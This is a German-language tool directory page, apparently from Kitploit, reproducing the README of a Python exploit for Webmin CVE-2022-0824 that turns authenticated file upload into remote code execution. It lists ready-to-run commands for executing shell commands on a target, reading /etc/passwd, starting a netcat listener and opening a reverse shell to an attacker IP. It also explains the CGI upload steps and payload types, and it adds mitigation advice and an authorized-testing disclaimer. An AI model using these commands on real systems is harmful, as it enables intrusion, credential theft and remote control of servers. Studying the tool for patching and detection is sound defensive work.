Tool-Verzeichnis
Kategorien
Webmin-CVE-2022-0824-Enhanced-Exploit — Python-Exploit für Webmin CVE-2022-0824 mit Unterstützung für zwei Modi: direkte Befehlsausführung und Reverse Shell. Bietet mehrere Payload-Typen, intelligentes Dateimanagement und detailliertes Debug-Logging für autorisierte Sicherheitstests. | Kitploit
Tools / GitHub / nudttan91 / webmin-cve-2022-0824-enhanced-exploit
nudttan91/webmin-cve-2022-0824-enhanced-exploit
Webmin-CVE-2022-0824-Enhanced-Exploit Python-Exploit für Webmin CVE-2022-0824 mit Unterstützung für zwei Modi: direkte Befehlsausführung und Reverse Shell. Bietet mehrere Payload-Typen, intelligentes Dateimanagement und detailliertes Debug-Logging für autorisierte Sicherheitstests.
7 vor 1 JahrEntdecken Sie die meistgenutzten Tools unserer Community.
Letzte 7 Tage Letzte 30 Tage
Webmin-CVE-2022-0824-Enhanced-Exploit
[!IMPORTANT]
Webmin CVE-2022-0824 verbessertes Exploit-Tool – Unterstützt zwei Modi: Befehlsausführung und Reverse Shell
[!IMPORTANT]
Ein verbessertes Exploit-Tool für die Schwachstelle Webmin CVE-2022-0824, das direkte Befehlsausführung und Reverse Shell unterstützt.
🚀 Funktionen
✅ Zwei-Modus-Unterstützung : Befehlsausführungsmodus + Reverse-Shell-Modus
✅ Verschiedene Payloads : Perl, Bash, Python – drei verschiedene Payloads
✅ Intelligentes Dateimanagement : Automatische Generierung eindeutiger Dateinamen zur Vermeidung von Dateikonflikten
✅ Erzwungenes Überschreiben beim Hochladen : Automatische Behandlung von Überschreibungen vorhandener Dateien
✅ Mehrere Upload-Methoden : HTTP-Download, direkter Upload, Erstellung durch Befehlsausführung
✅ Detaillierte Debug-Informationen : Vollständiges Ausführungsprotokoll
✅ Benutzerfreundliche Oberfläche : Farbige Ausgabe und klare Statusmeldungen
CVE-Nummer : CVE-2022-0824
Betroffene Versionen : Webmin < 1.990
Schwachstellentyp : Remote Code Execution durch beliebigen Dateiupload
CVSS-Bewertung : 9.8 (Critical)
🛠️ Installationsanforderungen # Python 3.6+
pip3 install requests urllib3
📖 Verwendung
Befehlsausführungsmodus (empfohlen) # Grundlegende Befehlsausführung
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# Systeminformationen anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# Dateien auflisten
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# Sensible Dateien anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# Netzwerkinformationen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
Reverse-Shell-Modus # 1. Listener starten
nc -nlvp 9999
# 2. Exploit ausführen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
📝 Parameterbeschreibung Parameter Beschreibung Erforderlich Beispiel -t, --targetZiel-Webmin-URL ✅ http://192.168.1.100:10000/-c, --credentialAnmeldeinformationen ✅ admin:password-LS, --py3http_serverHTTP-Server-Adresse ✅ 192.168.1.50:8080--shellAuszuführender Befehl ❌ "ls -la"-L, --callback_ipRückruf-IP für Reverse Shell ❌* 192.168.1.50-P, --callback_portRückruf-Port für Reverse Shell ❌* 9999
*Hinweis: Im Reverse-Shell-Modus erforderlich
🎯 Anwendungsbeispiele
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
Beispiel 2: Dateisystem erkunden python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
Beispiel 3: Netzwerkkonfiguration anzeigen python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
🔧 Funktionsweise
Anmeldeüberprüfung : Anmeldung an der Webmin-Verwaltungsoberfläche mit den bereitgestellten Anmeldedaten
Payload-Generierung : Erstellung entsprechender CGI-Skripte je nach Modus
Datei-Upload : Hochladen des Payloads über die HTTP-Download-Funktion des Dateimanagers
Berechtigungseinstellung : Festlegen der Ausführungsberechtigungen für die hochgeladene Datei
Befehlsausführung : Aufruf des hochgeladenen CGI-Skripts zur Ausführung von Befehlen oder Aufbau einer Reverse-Verbindung
🛡️ Schutzempfehlungen
Aktualisieren Sie Webmin umgehend auf die neueste Version (>= 1.990)
Beschränken Sie den Netzwerkzugriff auf die Webmin-Verwaltungsoberfläche
Verwenden Sie starke Passwörter und Zwei-Faktor-Authentifizierung
Führen Sie regelmäßige Audits der Systemprotokolle durch
Setzen Sie eine Web Application Firewall (WAF) ein
⚠️ Haftungsausschluss Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.
🚫 Nicht für nicht autorisierte Systeme verwenden
🚫 Nicht für böswillige Angriffe verwenden
🚫 Der Benutzer trägt die entsprechende rechtliche Verantwortung
✅ Nur in Umgebungen mit ausdrücklicher Genehmigung verwenden
✅ Für Sicherheitsforschung und Schwachstellenvalidierung
📚 Technische Details
Payload-Typen
Perl CGI : Primärer Payload, beste Kompatibilität
Bash CGI : Alternativer Payload, geeignet für Linux-Systeme
Python CGI : Alternativer Payload, umfangreichste Funktionen
Upload-Methoden
HTTP-Download : Über die Remote-Download-Funktion des Webmin-Dateimanagers
Direkter Upload : Über die Datei-Upload-Schnittstelle
Befehlsbereitstellung : Erstellung von Dateien über Systembefehle
Dateibenennungsstrategie
MD5-Hash basierend auf Befehlsinhalt
Zeitstempel-Suffix
Stellt sicher, dass bei jeder Ausführung ein anderer Dateiname verwendet wird
🔄 Änderungsprotokoll
v5.0 (2025-08-05)
✨ Neuer Befehlsausführungsmodus
🐛 Problem mit Dateiüberschreibung behoben
🔧 Dateibenennungsstrategie verbessert
📈 Fehlerbehandlung verbessert
v4.0 (Basierend auf Original)
🎯 Basierend auf dem ursprünglichen Code von faisalfs10x
🔧 CGI-Kompatibilität verbessert
📝 Detaillierte Protokollierung hinzugefügt
🤝 Beitragen Willkommen bei der Einreichung von Issues und Pull Requests!
Forken Sie dieses Repository
Erstellen Sie einen Feature-Branch (git checkout -b feature/AmazingFeature)
Committen Sie die Änderungen (git commit -m 'Add some AmazingFeature')
Pushen Sie den Branch (git push origin feature/AmazingFeature)
Öffnen Sie einen Pull Request
📄 Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert – weitere Details finden Sie in der LICENSE -Datei.
🙏 Danksagungen
📞 Kontakt Bei Fragen oder Anregungen kontaktieren Sie uns bitte über:
📧 Einreichen eines GitHub Issue
🐛 Melden Sie Sicherheitsprobleme per privater Nachricht
⭐ Wenn dieses Projekt Ihnen hilft, geben Sie bitte einen Star zur Unterstützung!
🔗 Verwandte Links
requirements.txt requests>=2.25.1
urllib3>=1.26.0